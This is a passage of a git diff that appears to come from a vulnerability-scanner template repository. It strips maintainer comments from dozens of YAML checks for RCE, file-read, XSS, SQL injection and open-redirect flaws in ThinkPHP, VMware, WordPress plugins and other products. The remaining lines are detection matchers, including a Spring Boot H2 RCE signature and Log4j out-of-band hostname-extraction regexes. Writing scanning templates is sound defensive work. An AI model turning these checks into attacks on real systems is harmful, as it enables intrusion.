a/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml +++ b/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml @@ -33,4 +33,4 @@ http: words: - "application/xml" -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml b/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml index 787fb4e848..afe4ecae3b 100644 --- a/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml +++ b/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/04 + diff --git a/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml index 5d41808ac6..78a6bc133e 100644 --- a/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml +++ b/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -37,4 +37,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/03/30 + diff --git a/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml index bc9c078b36..c8bf8a8b44 100644 --- a/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml @@ -42,4 +42,4 @@ http: words: - '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT' -# Enhanced by mp on 2022/05/31 + diff --git a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml index 07b274d7c6..1d3c5fcfea 100644 --- a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml @@ -60,4 +60,4 @@ http: regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output -# Enhanced by mp on 2022/05/31 + diff --git a/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml b/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml index 30698ca6b0..f1f3debc32 100644 --- a/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml +++ b/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml @@ -36,4 +36,4 @@ http: words: - "text/html" -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml b/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml index 3105261d4d..103e853b2d 100644 --- a/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml +++ b/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 + diff --git a/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml index d974b2fcc9..6f3be1b59c 100644 --- a/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml +++ b/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml @@ -36,4 +36,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml b/http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml index 76efa9b2f7..85d34ee75f 100644 --- a/http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml +++ b/http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml @@ -26,4 +26,4 @@ http: status: - 200 -# Enhanced by md on 2022/10/05 + diff --git a/http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml b/http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml index 9b4f631734..7dea0822ee 100644 --- a/http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml +++ b/http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 + diff --git a/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml b/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml index e3325418fa..b461b8558c 100644 --- a/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml +++ b/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml @@ -34,4 +34,4 @@ http: - 'status_code_2 == 200' condition: and -# Enhanced by mp on 2022/05/31 + diff --git a/http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml index ccd63badc8..bfc60456af 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml @@ -28,4 +28,4 @@ http: status: - 200 -# Enhanced by md on 2022/10/05 + diff --git a/http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml b/http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml index df04b8326c..890a66b1dd 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/31 + diff --git a/http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml index 5e76723482..a378f03cf7 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml @@ -28,4 +28,4 @@ http: status: - 200 -# Enhanced by md on 2022/10/05 + diff --git a/http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml index f9b1deb07d..0adfe7626f 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by md on 2022/10/05 + diff --git a/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml index ed21e72210..95319006dc 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml @@ -28,4 +28,4 @@ http: status: - 500 -# Enhanced by mp on 2022/04/20 + diff --git a/http/vulnerabilities/tongda/tongda-path-traversal.yaml b/http/vulnerabilities/tongda/tongda-path-traversal.yaml index 32605ccbdf..4311821fd9 100644 --- a/http/vulnerabilities/tongda/tongda-path-traversal.yaml +++ b/http/vulnerabilities/tongda/tongda-path-traversal.yaml @@ -44,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/videoxpert-lfi.yaml b/http/vulnerabilities/videoxpert-lfi.yaml index d759c56dc8..7d9283ea66 100644 --- a/http/vulnerabilities/videoxpert-lfi.yaml +++ b/http/vulnerabilities/videoxpert-lfi.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2023/01/15 + diff --git a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml index e1e2618627..d0cc66a883 100644 --- a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml @@ -69,4 +69,4 @@ http: regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output -# Enhanced by md on 2022/10/05 + diff --git a/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml b/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml index 6e196345ae..64aeafbc4a 100644 --- a/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml @@ -48,4 +48,4 @@ http: regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output -# Enhanced by md on 2022/10/06 + diff --git a/http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml index 1af91746d6..45207566a6 100644 --- a/http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml +++ b/http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml index 8c7ae1bdb8..c311249368 100644 --- a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml @@ -48,4 +48,4 @@ http: regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output -# Enhanced by md on 2022/10/06 + diff --git a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml index 595023c139..a042362cd4 100644 --- a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml +++ b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml @@ -67,4 +67,4 @@ http: regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output -# Enhanced by mp on 2022/04/05 + diff --git a/http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml index 162a97412d..46ddc6b8b8 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 2 fofa-query: app="泛微-协同办公OA" - tags: ecology,upload,fileupload,intrusive + tags: ecology,fileupload,intrusive http: - raw: @@ -43,4 +43,4 @@ http: - "contains(body_2, '319463310816') || status_code_2 == 200" condition: and -# Enhanced by md on 2022/10/31 + diff --git a/http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml b/http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml index d3251052de..2e14cba8b6 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml @@ -28,4 +28,4 @@ http: - "/weaver/" part: body -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml b/http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml index df0134777b..0a1c9c340d 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml @@ -27,4 +27,4 @@ http: - "/weaver/" part: body -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml b/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml index cad435c94c..d404ae2f13 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml b/http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml index d7f68bfa6a..a768521579 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/weaver/oa-v9-uploads-file.yaml b/http/vulnerabilities/weaver/oa-v9-uploads-file.yaml index 5e1dea6c7a..f5149a32fd 100644 --- a/http/vulnerabilities/weaver/oa-v9-uploads-file.yaml +++ b/http/vulnerabilities/weaver/oa-v9-uploads-file.yaml @@ -42,4 +42,4 @@ http: - 'status_code_2 == 200' condition: and -# Enhanced by md on 2022/10/06 + diff --git a/http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml b/http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml index fa35513da7..003b61d307 100644 --- a/http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml +++ b/http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2023/01/15 + diff --git a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml index 52f24fe126..b0258ac015 100644 --- a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml @@ -51,4 +51,4 @@ http: - "contains(body_2, '3DPrint-arbitrary-file-upload')" condition: and -# Enhanced by md on 2022/10/31 + diff --git a/http/vulnerabilities/wordpress/404-to-301-xss.yaml b/http/vulnerabilities/wordpress/404-to-301-xss.yaml index 91cac54135..9c02165773 100644 --- a/http/vulnerabilities/wordpress/404-to-301-xss.yaml +++ b/http/vulnerabilities/wordpress/404-to-301-xss.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/ad-widget-lfi.yaml b/http/vulnerabilities/wordpress/ad-widget-lfi.yaml index 5726d9261a..768ce2a9bb 100644 --- a/http/vulnerabilities/wordpress/ad-widget-lfi.yaml +++ b/http/vulnerabilities/wordpress/ad-widget-lfi.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml b/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml index 23b8a89030..c3a28b1af1 100644 --- a/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml +++ b/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml b/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml index 3e7c54f974..5d976d961a 100644 --- a/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml @@ -33,4 +33,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/wordpress/age-gate-xss.yaml b/http/vulnerabilities/wordpress/age-gate-xss.yaml index 649673b490..0b57177f44 100644 --- a/http/vulnerabilities/wordpress/age-gate-xss.yaml +++ b/http/vulnerabilities/wordpress/age-gate-xss.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml index 480a51c4e7..dd54d0a583 100644 --- a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml +++ b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml @@ -48,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/22 + diff --git a/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml b/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml index 73d71c3420..5a50c1fd7a 100644 --- a/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml +++ b/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml b/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml index 51bb899ed5..a88329ba1f 100644 --- a/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml +++ b/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml @@ -41,4 +41,4 @@ http: status: - 404 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/aspose-file-download.yaml b/http/vulnerabilities/wordpress/aspose-file-download.yaml index 99964595d6..128227e826 100644 --- a/http/vulnerabilities/wordpress/aspose-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-file-download.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml b/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml index c95a32015d..5a52b86ee5 100644 --- a/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml @@ -30,4 +30,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml b/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml index 97feb9783e..5ad03454b5 100644 --- a/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/wordpress/aspose-words-file-download.yaml b/http/vulnerabilities/wordpress/aspose-words-file-download.yaml index d470b93d04..1ea0826696 100644 --- a/http/vulnerabilities/wordpress/aspose-words-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-words-file-download.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml index 3fb4c66706..3e18dbd7df 100644 --- a/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml @@ -26,4 +26,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml b/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml index d70bb60e7b..6638fe0070 100644 --- a/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml +++ b/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/brandfolder-lfi.yaml b/http/vulnerabilities/wordpress/brandfolder-lfi.yaml index 078c0d8c0f..a303c427f4 100644 --- a/http/vulnerabilities/wordpress/brandfolder-lfi.yaml +++ b/http/vulnerabilities/wordpress/brandfolder-lfi.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml index 95f3385ab2..e052fe146f 100644 --- a/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml @@ -24,4 +24,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# Enhanced by mp on 2022/08/01 + diff --git a/http/vulnerabilities/wordpress/calameo-publications-xss.yaml b/http/vulnerabilities/wordpress/calameo-publications-xss.yaml index 38469ebced..ddb250c964 100644 --- a/http/vulnerabilities/wordpress/calameo-publications-xss.yaml +++ b/http/vulnerabilities/wordpress/calameo-publications-xss.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml b/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml index db9ebc8b59..1de1e3cf53 100644 --- a/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml +++ b/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml @@ -48,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/cherry-file-download.yaml b/http/vulnerabilities/wordpress/cherry-file-download.yaml index 91176656b9..f729c33551 100644 --- a/http/vulnerabilities/wordpress/cherry-file-download.yaml +++ b/http/vulnerabilities/wordpress/cherry-file-download.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/21 + diff --git a/http/vulnerabilities/wordpress/cherry-lfi.yaml b/http/vulnerabilities/wordpress/cherry-lfi.yaml index f631a2f3e1..18ab3ae0d7 100644 --- a/http/vulnerabilities/wordpress/cherry-lfi.yaml +++ b/http/vulnerabilities/wordpress/cherry-lfi.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/21 + diff --git a/http/vulnerabilities/wordpress/church-admin-lfi.yaml b/http/vulnerabilities/wordpress/church-admin-lfi.yaml index 989ba05c0e..4dc78dccaf 100644 --- a/http/vulnerabilities/wordpress/church-admin-lfi.yaml +++ b/http/vulnerabilities/wordpress/church-admin-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 + diff --git a/http/vulnerabilities/wordpress/churchope-lfi.yaml b/http/vulnerabilities/wordpress/churchope-lfi.yaml index 7470a5a4c3..3ee6e801f1 100644 --- a/http/vulnerabilities/wordpress/churchope-lfi.yaml +++ b/http/vulnerabilities/wordpress/churchope-lfi.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/12 + diff --git a/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml b/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml index e3b44848f0..92ca2ff1ac 100644 --- a/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml +++ b/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/curcy-xss.yaml b/http/vulnerabilities/wordpress/curcy-xss.yaml index 0c00ca98f1..20b64a52c3 100644 --- a/http/vulnerabilities/wordpress/curcy-xss.yaml +++ b/http/vulnerabilities/wordpress/curcy-xss.yaml @@ -48,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml b/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml index 1d9727e44e..38688a8c68 100644 --- a/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml +++ b/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/05 + diff --git a/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml index a7924bc99e..5ca06ccab2 100644 --- a/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml @@ -27,4 +27,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml b/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml index 37190cf6b2..2f5d9d05e2 100644 --- a/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml +++ b/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml @@ -47,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/13 + diff --git a/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml b/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml index a27650b16c..e99ba85dd0 100644 --- a/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml +++ b/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/hb-audio-lfi.yaml b/http/vulnerabilities/wordpress/hb-audio-lfi.yaml index 763b31571d..62f1d4824b 100644 --- a/http/vulnerabilities/wordpress/hb-audio-lfi.yaml +++ b/http/vulnerabilities/wordpress/hb-audio-lfi.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 + diff --git a/http/vulnerabilities/wordpress/health-check-lfi.yaml b/http/vulnerabilities/wordpress/health-check-lfi.yaml index cf4e8e2ff9..db74a42d5d 100644 --- a/http/vulnerabilities/wordpress/health-check-lfi.yaml +++ b/http/vulnerabilities/wordpress/health-check-lfi.yaml @@ -50,4 +50,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 + diff --git a/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml b/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml index 1a9006b2cf..1a6c7c097d 100644 --- a/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml +++ b/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/29 + diff --git a/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml b/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml index 245753fefa..22f4c8085f 100644 --- a/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml +++ b/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/29 + diff --git a/http/vulnerabilities/wordpress/members-list-xss.yaml b/http/vulnerabilities/wordpress/members-list-xss.yaml index ebf04f4262..3e6d6ca203 100644 --- a/http/vulnerabilities/wordpress/members-list-xss.yaml +++ b/http/vulnerabilities/wordpress/members-list-xss.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml b/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml index 5b3e32eac8..96e9885b6d 100644 --- a/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml +++ b/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml @@ -48,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml b/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml index fc18c1913f..99540cbe55 100644 --- a/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml +++ b/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 + diff --git a/http/vulnerabilities/wordpress/music-store-open-redirect.yaml b/http/vulnerabilities/wordpress/music-store-open-redirect.yaml index eb4f7d8590..a1af8cc92d 100644 --- a/http/vulnerabilities/wordpress/music-store-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/music-store-open-redirect.yaml @@ -29,4 +29,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/wordpress/my-chatbot-xss.yaml b/http/vulnerabilities/wordpress/my-chatbot-xss.yaml index e06ae7bad8..1d43a0c80a 100644 --- a/http/vulnerabilities/wordpress/my-chatbot-xss.yaml +++ b/http/vulnerabilities/wordpress/my-chatbot-xss.yaml @@ -46,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/13 + diff --git a/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml index a7b5aea429..f553f72190 100644 --- a/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml +++ b/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml @@ -29,4 +29,4 @@ http: - "The base configurations of the WordPress" condition: and -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/new-user-approve-xss.yaml b/http/vulnerabilities/wordpress/new-user-approve-xss.yaml index 8d09ccf767..1f3e6a0420 100644 --- 